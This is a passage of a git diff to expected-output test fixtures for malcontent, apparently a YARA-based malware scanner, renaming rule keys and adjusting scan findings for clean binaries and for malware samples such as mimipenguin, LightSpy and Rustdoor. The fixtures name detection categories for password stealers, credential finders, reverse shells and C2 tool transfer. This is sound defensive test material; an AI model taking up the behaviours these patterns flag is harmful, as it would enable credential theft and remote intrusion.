[https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car](https://github.com/clap-rs/clap/issues/home/linuxbrew/.cache/Homebrew/car)
[https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c](https://github.com/clap-rs/clap/issues=-/home/linuxbrew/.cache/Homebrew/c)
[https://github.com/tree-sitter/tree-sitter-Failed](https://github.com/tree-sitter/tree-sitter-Failed)
[https://gitlab.com/https](https://gitlab.com/https)
[https://parser.cparser.h](https://parser.cparser.h)
[https://tree-sitter.github.io/tree-sitter.jshttps](https://tree-sitter.github.io/tree-sitter.jshttps)
[https://tree-sitter.github.io/tree-sitter.wasmhttps](https://tree-sitter.github.io/tree-sitter.wasmhttps)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-16x16.png)
[https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png](https://tree-sitter.github.io/tree-sitter/assets/images/favicon-32x32.png)
[https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT](https://tree-sitter.github.io/tree-sitter/assets/js/playground.jsTREE_SIT)
[https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j](https://tree-sitter.github.io/tree-sitter/assets/schemas/grammar.schema.j)
[https://tree-sitter.github.io/tree-sitter/creating-parsers](https://tree-sitter.github.io/tree-sitter/creating-parsers)
[https://tree-sitter.github.io/tree-sitter/playground](https://tree-sitter.github.io/tree-sitter/playground)
[https://tree-sitter.github.io/tree-sitter/syntax-highlighting](https://tree-sitter.github.io/tree-sitter/syntax-highlighting)
[https://tree-sitter.github.io/tree-sitter/using-parsers](https://tree-sitter.github.io/tree-sitter/using-parsers) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [stdout.write(output)](https://github.com/search?q=stdout.write%28output%29&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd -u env -i](https://github.com/search?q=cd+-u++env+-i&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index ccd6f1313..8a2a5453d 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -53,6 +53,7 @@ discover/cloud/google_metadata: low discover/cloud/google_storage: low discover/network/mac_address: medium discover/network/netstat: medium +discover/process/name_get: medium discover/processes/list: medium discover/system/cpu_info: low discover/system/hostname_get: low @@ -182,7 +183,6 @@ process/executable_path: low process/groupid_set: low process/groups_set: low process/multithreaded: low -process/name_get: medium process/userid_set: low sus/exclamation: medium sus/intercept: medium diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index f365f9270..d21d13145 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.lessannoyingcrm.com?UserCode=](https://api.lessannoyingcrm.com?UserCode=)
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.scraperapi.com?api_key=](https://api.scraperapi.com?api_key=)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png?view=Unified&key=ambiguous)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://sslmate.com/api/v2/certs/example.com?expand=current](https://sslmate.com/api/v2/certs/example.com?expand=current)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) | | HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.com](https://github.com/search?q=pastebin.com&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code) | | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) | | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) | @@ -68,7 +68,7 @@ | MEDIUM | [fs/proc/self_mountinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-mountinfo.yara#proc_self_mountinfo) | gets mount info associated to this process | [/proc/self/mountinfo](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfo&type=code) | | MEDIUM | [impact/ddos](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ddos/ddos.yara#ddos) | References DDoS | [DDoS](https://github.com/search?q=DDoS&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [:CodeWithScopeSpacerheartbeatinterval](https://github.com/search?q=%3ACodeWithScopeSpacerheartbeatinterval&type=code)
[ConnServer heartbeat started](https://github.com/search?q=ConnServer+heartbeat+started&type=code)
[HeartbeatMS](https://github.com/search?q=HeartbeatMS&type=code)
[SetHeartbeatInterval](https://github.com/search?q=SetHeartbeatInterval&type=code)
[WithHeartbeatInterval](https://github.com/search?q=WithHeartbeatInterval&type=code)
[WithHeartbeatTimeout](https://github.com/search?q=WithHeartbeatTimeout&type=code)
[be greater than or equal to the heartbeat interva](https://github.com/search?q=be+greater+than+or+equal+to+the+heartbeat+interva&type=code)
[comWriteDocumentElementheartbeatfrequenc](https://github.com/search?q=comWriteDocumentElementheartbeatfrequenc&type=code)
[comheartbeatMain: re](https://github.com/search?q=comheartbeatMain%3A+re&type=code)
[crc32Rolling backcleanup docsheartbeat_msgeo_d](https://github.com/search?q=crc32Rolling+backcleanup+docsheartbeat_msgeo_d&type=code)
[edConnection pool clearedServer heartbeat failedS](https://github.com/search?q=edConnection+pool+clearedServer+heartbeat+failedS&type=code)
[edclient_sql_exceptionFailed to heartbeat](https://github.com/search?q=edclient_sql_exceptionFailed+to+heartbeat&type=code)
[eerror setting read deadline in heartbeater:](https://github.com/search?q=eerror+setting+read+deadline+in+heartbeater%3A&type=code)
[eonly valid as initial handshakeheartbeat is not](https://github.com/search?q=eonly+valid+as+initial+handshakeheartbeat+is+not&type=code)
[heartbeatCtxCance](https://github.com/search?q=heartbeatCtxCance&type=code)
[heartbeatFrame](https://github.com/search?q=heartbeatFrame&type=code)
[heartbeatInterval](https://github.com/search?q=heartbeatInterval&type=code)
[heartbeatLock](https://github.com/search?q=heartbeatLock&type=code)
[heartbeatTimeout](https://github.com/search?q=heartbeatTimeout&type=code)
[icedisableConsoleLoginfailed to heartbeat](https://github.com/search?q=icedisableConsoleLoginfailed+to+heartbeat&type=code)
[newHeartbeatDuration](https://github.com/search?q=newHeartbeatDuration&type=code)
[orcHeartbeating](https://github.com/search?q=orcHeartbeating&type=code)
[overflow reading version stringHeartbeats should](https://github.com/search?q=overflow+reading+version+stringHeartbeats+should&type=code)
[parquetheartbeat started](https://github.com/search?q=parquetheartbeat+started&type=code)
[parseHeartbeatFrame](https://github.com/search?q=parseHeartbeatFrame&type=code)
[pollHeartbeatTime](https://github.com/search?q=pollHeartbeatTime&type=code)
[publishServerHeartbeatFailedEv](https://github.com/search?q=publishServerHeartbeatFailedEv&type=code)
[publishServerHeartbeatStartedE](https://github.com/search?q=publishServerHeartbeatStartedE&type=code)
[publishServerHeartbeatSucceede](https://github.com/search?q=publishServerHeartbeatSucceede&type=code)
[setupHeartbeatConnecti](https://github.com/search?q=setupHeartbeatConnecti&type=code)
[sha1publickeysubsystemheartbeatwithcoor](https://github.com/search?q=sha1publickeysubsystemheartbeatwithcoor&type=code)
[sheartbeat stopped](https://github.com/search?q=sheartbeat+stopped&type=code)
[startHeartBeat](https://github.com/search?q=startHeartBeat&type=code)
[stopHeartBeat](https://github.com/search?q=stopHeartBeat&type=code)
[swordincludeRetryReasonstopping heartbeat](https://github.com/search?q=swordincludeRetryReasonstopping+heartbeat&type=code)
[tarting server monitoringServer heartbeat succeed](https://github.com/search?q=tarting+server+monitoringServer+heartbeat+succeed&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [DoneDownloadCond](https://github.com/search?q=DoneDownloadCond&type=code)
[DownloadArtifactsFile](https://github.com/search?q=DownloadArtifactsFile&type=code)
[DownloadAvatar](https://github.com/search?q=DownloadAvatar&type=code)
[DownloadContentsWithMeta](https://github.com/search?q=DownloadContentsWithMeta&type=code)
[DownloadPackageFile](https://github.com/search?q=DownloadPackageFile&type=code)
[DownloadReleaseAsset](https://github.com/search?q=DownloadReleaseAsset&type=code)
[ExportDownload](https://github.com/search?q=ExportDownload&type=code)
[FTPDownload](https://github.com/search?q=FTPDownload&type=code)
[FailedDownloads](https://github.com/search?q=FailedDownloads&type=code)
[FuncDownloadHelper](https://github.com/search?q=FuncDownloadHelper&type=code)
[GeoIpDownloadStatistics](https://github.com/search?q=GeoIpDownloadStatistics&type=code)
[GetArchiveDownloadURL](https://github.com/search?q=GetArchiveDownloadURL&type=code)
[GetBrowserDownloadURL](https://github.com/search?q=GetBrowserDownloadURL&type=code)
[GetDownloadCount](https://github.com/search?q=GetDownloadCount&type=code)
[GetDownloadLocation](https://github.com/search?q=GetDownloadLocation&type=code)
[GetDownloadURL](https://github.com/search?q=GetDownloadURL&type=code)
[GetDownloadsURL](https://github.com/search?q=GetDownloadsURL&type=code)
[GetHasDownloads](https://github.com/search?q=GetHasDownloads&type=code)
[GetTempDownloadToken](https://github.com/search?q=GetTempDownloadToken&type=code)
[MFA_TOKENdownload start chunk](https://github.com/search?q=MFA_TOKENdownload+start+chunk&type=code)
[NextDownloader](https://github.com/search?q=NextDownloader&type=code)
[NodeInfoIngestDownloader](https://github.com/search?q=NodeInfoIngestDownloader&type=code)
[STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG](https://github.com/search?q=STREAM_CHUNK_DOWNLOADSF_CLIENT_CONFIG&type=code)
[SuccessfulDownloads](https://github.com/search?q=SuccessfulDownloads&type=code)
[URLDownloadToFile](https://github.com/search?q=URLDownloadToFile&type=code)
[addDownloader](https://github.com/search?q=addDownloader&type=code)
[archive_download_url](https://github.com/search?q=archive_download_url&type=code)
[browser_download_url](https://github.com/search?q=browser_download_url&type=code)
[chunkDownloader](https://github.com/search?q=chunkDownloader&type=code)
[chunk_downloader](https://github.com/search?q=chunk_downloader&type=code)
[downloadChunkHelper](https://github.com/search?q=downloadChunkHelper&type=code)
[downloadH](https://github.com/search?q=downloadH&type=code)
[downloadLocation](https://github.com/search?q=downloadLocation&type=code)
[downloadOCSPCacheServer](https://github.com/search?q=downloadOCSPCacheServer&type=code)
[downloadPatches](https://github.com/search?q=downloadPatches&type=code)
[download_count](https://github.com/search?q=download_count&type=code)
[downloader id](https://github.com/search?q=downloader+id&type=code)
[downloads_url](https://github.com/search?q=downloads_url&type=code)
[downloadsrepos](https://github.com/search?q=downloadsrepos&type=code)
[failed_downloads](https://github.com/search?q=failed_downloads&type=code)
[funcDownloadHelper](https://github.com/search?q=funcDownloadHelper&type=code)
[geoipdownloadstatistics](https://github.com/search?q=geoipdownloadstatistics&type=code)
[getNextChunkDownloader](https://github.com/search?q=getNextChunkDownloader&type=code)
[has_downloads](https://github.com/search?q=has_downloads&type=code)
[methodTotalDownloadTimeshards](https://github.com/search?q=methodTotalDownloadTimeshards&type=code)
[newStreamChunkDownloader](https://github.com/search?q=newStreamChunkDownloader&type=code)
[nodeinfoingestdownloader](https://github.com/search?q=nodeinfoingestdownloader&type=code)
[populateChunkDownloader](https://github.com/search?q=populateChunkDownloader&type=code)
[profileno download link found for](https://github.com/search?q=profileno+download+link+found+for&type=code)
[setNextChunkDownloader](https://github.com/search?q=setNextChunkDownloader&type=code)
[snowflakeChunkDownloader](https://github.com/search?q=snowflakeChunkDownloader&type=code)
[sstart downloading](https://github.com/search?q=sstart+downloading&type=code)
[streamChunkDownloader](https://github.com/search?q=streamChunkDownloader&type=code)
[successful_downloads](https://github.com/search?q=successful_downloads&type=code)
[tailChunkDownloader](https://github.com/search?q=tailChunkDownloader&type=code)
[temp_download_token](https://github.com/search?q=temp_download_token&type=code)
[the scheduleddownloads](https://github.com/search?q=the+scheduleddownloads&type=code)
[theequationsdownload](https://github.com/search?q=theequationsdownload&type=code)
[thresholddownloading error](https://github.com/search?q=thresholddownloading+error&type=code)
[total_download_time](https://github.com/search?q=total_download_time&type=code)
[useStreamDownloader](https://github.com/search?q=useStreamDownloader&type=code)
[vMaxChunkDownloadWorkers](https://github.com/search?q=vMaxChunkDownloadWorkers&type=code)
[vmsdownloading done](https://github.com/search?q=vmsdownloading+done&type=code)
[wcould not download file for scan](https://github.com/search?q=wcould+not+download+file+for+scan&type=code)
[wfailed to download patches](https://github.com/search?q=wfailed+to+download+patches&type=code)
[when trying to download file for scan](https://github.com/search?q=when+trying+to+download+file+for+scan&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl | [curl / libcurl / php_curl](https://github.com/search?q=curl+%2F+libcurl+%2F+php_curl&type=code) | @@ -114,6 +114,7 @@ | LOW | [discover/cloud/aws_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/aws-metadata.yara#aws_metadata) | References the AWS EC2 metadata token | [X-aws-ec2-metadata-token](https://github.com/search?q=X-aws-ec2-metadata-token&type=code) | | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) | | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | @@ -183,6 +184,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index b873ee458..8ba839e52 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -3,7 +3,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[downloading](https://github.com/search?q=downloading&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple index a8e53c4ae..b0708c44b 100644 --- a/tests/linux/clean/wolfictl.simple +++ b/tests/linux/clean/wolfictl.simple @@ -55,7 +55,7 @@ discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/macos/xprotect: medium evasion/file/location/dev_shm: medium -evasion/file/location/system_directories: medium +evasion/file/location/system_directory: medium evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low diff --git a/tests/linux/mimipenguin/python/mimipenguin.simple b/tests/linux/mimipenguin/python/mimipenguin.simple index bc884bf20..9e1275d11 100644 --- a/tests/linux/mimipenguin/python/mimipenguin.simple +++ b/tests/linux/mimipenguin/python/mimipenguin.simple @@ -7,6 +7,7 @@ credential/password/finder: high credential/ssh/d: medium data/base64/decode: medium data/encoding/base64: low +discover/process/name_get: medium discover/processes/list: medium discover/system/platform: medium exfil/stealer/password: critical @@ -22,4 +23,3 @@ net/url/embedded: low os/fd/read: low persist/daemon: medium privesc/sudo: medium -process/name_get: medium diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple index b43228808..5851a1c32 100644 --- a/tests/macOS/2024.Ezuri/libdpt1.so.simple +++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple @@ -12,7 +12,6 @@ fs/path/users: medium fs/permission/chown: medium fs/permission/modify: medium impact/remote_access/net_exec: medium -lateral/scan/tool: medium net/socket/receive: low net/socket/send: low process/multithreaded: low diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple index 876122683..913a536eb 100644 --- a/tests/macOS/2024.LightSpy/dropper.simple +++ b/tests/macOS/2024.LightSpy/dropper.simple @@ -6,10 +6,11 @@ c2/tool_transfer/macos: critical crypto/aes: low crypto/xor: high data/hash/md5: medium +discover/process/name_get: medium discover/system/cpu_info: low discover/system/network: high discover/system/platform: medium -evasion/file/location/odd_pidfile: high +evasion/file/location/pidfile: high exec/dylib/symbol_address: medium exec/dylib/user: medium exec/plugin: low @@ -30,5 +31,4 @@ os/kernel/dispatch_semaphore: low os/sync/semaphore_user: low persist/daemon: medium persist/pid_file: medium -process/name_get: medium sus/entitlement: medium diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple index d5fe25d55..7ac915779 100644 --- a/tests/macOS/2024.Rustdoor/localfile.simple +++ b/tests/macOS/2024.Rustdoor/localfile.simple @@ -45,7 +45,6 @@ fs/tempdir: low fs/tempdir/TMPDIR: low hw/disk_info: medium impact/remote_access/reverse_shell: medium -lateral/scan/tool: medium malware/family/rustdoor: critical net/download: medium net/download/fetch: high diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index cf15f5aae..939d68075 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -2,7 +2,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| -MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/macOS/clean/ls.sdiff.level_2 b/tests/macOS/clean/ls.sdiff.level_2 index f2fe90892..fa0ab56fa 100644 --- a/tests/macOS/clean/ls.sdiff.level_2 +++ b/tests/macOS/clean/ls.sdiff.level_2 @@ -1,4 +1,3 @@ --- missing: ls.x86_64 --lateral/scan/tool -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 3ed486b6c..9e0e93a9c 